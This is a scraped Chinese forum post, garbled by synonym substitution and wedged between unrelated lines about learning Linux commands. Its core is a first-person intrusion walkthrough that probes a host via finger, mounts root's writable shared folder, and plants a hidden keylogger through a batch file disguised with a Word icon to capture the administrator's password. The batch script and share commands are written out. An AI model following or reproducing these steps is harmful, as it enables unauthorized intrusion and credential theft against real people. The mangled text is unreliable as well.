|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
Linux的常用命令find,察看man文档,初学者一定会觉得太复杂而不原意用,但是你一旦学会就爱不释手。
我发明了一个网站,因而惯例进侵。很好,它的FINGER开着,因而我编了一个SHELL,aaa帐号试到zzz(bytheway,这是我发明的一个网上纪律,那就是帐号的长度与口令的强度成反比,假如一个帐号只要两三位长,那它的口令一样平常也很复杂,反之亦然,故且称之为若氏定理吧),了局一个帐号也不存在,我没有再试它的帐号。由于我被它开的端口吸引住了,它开着WWW,我就不信它不堕落。连续拿了五种CGI和WWW扫描器总计扫了三四百种罕见毛病它几近都不存在仍是看看root的信息吧:
fingerroot@xxx.xxx.xxx
Loginname:rootInreallife:systemPRIVILEGEDaccount
Directory:/Shell:/bin/sh
LastloginFriJul2809:21onttyp0from202.xx.xx.xx
NoPlan.
root常常来,谁人202.xx.xx.xx就是他用的事情站了,从那会不会看到点器材呢?
netview202.xx.xx.xx
Sharedresourcesat202.xx.xx.xx
SharenameTypeComment
x
x
我的公函包
Thecommandwascompletedsuccessfully.
在上彀的呆板上开着WINDOWS的“文件和打印机共享”的服务,是良多人简单漫不经心的,这个root没有破例。假如它的C盘共享了并且可写那就行了,但那是做梦,如今开了共享的目次没有一个是根目次,连D驱的都没有。别发急,渐渐来。x失落的那些文件夹都没用,不克不及写,内里尽是些英文原着,这个root还挺行的。“我的公函包”吸引了我的注重,这是一个用于将分歧的呆板上的材料举行同步的工具,很明显这个root要常常更新主机上的主页,偶然候在本人的呆板上编,偶然候在主机上编……以是很主要的一点:“我的公函包”的共享一样平常都是可写的!
那我再出来看看。
>netusei:202.xx.xx.xx
>i:
>echoasdf>temp.txt
不错,的确可写。
>deltemp.txt
不留陈迹――黑客的习气。
>dir/od/p
看看都有些甚么…… 倒数第二排谁人是甚么?“X月事情企图.doc”!就是它了,既然是企图就不成能写完了就丢一边,它一定会再次翻开它的――最少下个月写企图时要COPY一下:->
该下手了,我的方针就是让它下次翻开时误中我的圈套而运转我躲的木马。我此次用的是一个键盘计录软件HOOKDUMP,我以为它挺好的,代价实惠,量也足…… 对不起,说习气了,应当是它不但纪录下全体击键,还纪录下翻开或关失落了甚么程序、按过甚么按纽、用过甚么菜单…… 总之,它的纪录让你就和你站在他死后看他操纵盘算机一样具体了。您要问那末多木马你为啥装这个?要晓得不管是中国的冰河、netspy仍是本国的netbus、BO,都被各类杀毒软件列为头号侦察工具,而一个root的呆板上可不成能没装杀毒软件?仍是HOOKDUMP好,小小的,不起眼,不外假如人人都用只怕我再用它的时机就少了……
>copyhookdump.*i:
增补一点:上传前先编好它的hookdump.ini文件,置为埋没体例运转,否则root一运转屏幕上蹦出一年夜窗口可就……。
然后再在本人的呆板上编一个同名的BAT文件:X月事情企图.BAT
>editc:X月事情企图.BAT
@echooff
hookdump
attrib-hX月事情企图.doc
C:ProgramFilesMicrosoftOfficeWinwordX月事情企图.doc
attrib-htemp.bat
deltemp.pif
deltemp.bat
看分明了吧?root运转了这个BAT文件实践上就是先运转木马,再挪用WINWORD文件翻开它想开的这个文件,然后自我删除,大概它呆板上WINWORD的地位分歧,那挪用就会失利,不外没关系,归正BAT会即刻删除,他会觉得是本人的误操纵。
这时候你的C驱根目次就有了这么一个BAT文件,它是一个方形的图标,和谁人WORD文件天差地别,root怎样会运转它呢?不妨,在这个文件上点右键,点属性,在“程序”栏选“变动图标”不就好了吗?WORD的图标在你呆板C:ProgramFilesMicrosoftOffice中。还要将“运转”改成“最小化”,“加入时封闭”打上勾,如许才干包管在运转时一点迹象也没有。现实上这个BAT文件酿成了两个,另有一个PIF文件就是它的图标。
把这两个文件传上往:
>copyX月事情企图.bati:
>copyX月事情企图.pifi:
然后把它的文件和本人的文件都躲起来:
>attrib+hX月事情企图.doc
>attrib+hX月事情企图.bat
如许,root的“公函包”里只剩下一个和本来千篇一律的WORD图标,他做梦也没想到这已酿成了一个BAT文件。然后能够喘口吻了,让我们悄悄的等……
几天后,我进进这个事情站,取下纪录上去的击键纪录,找出root的口令,进进主机
</p>
但不会命令而成为高手也是不可能的.这就好比学英语,什么语法都不懂,只捧着单词手册背单词是学不会英语的,但是没有单词词汇量英语水平也提不高的。 |
|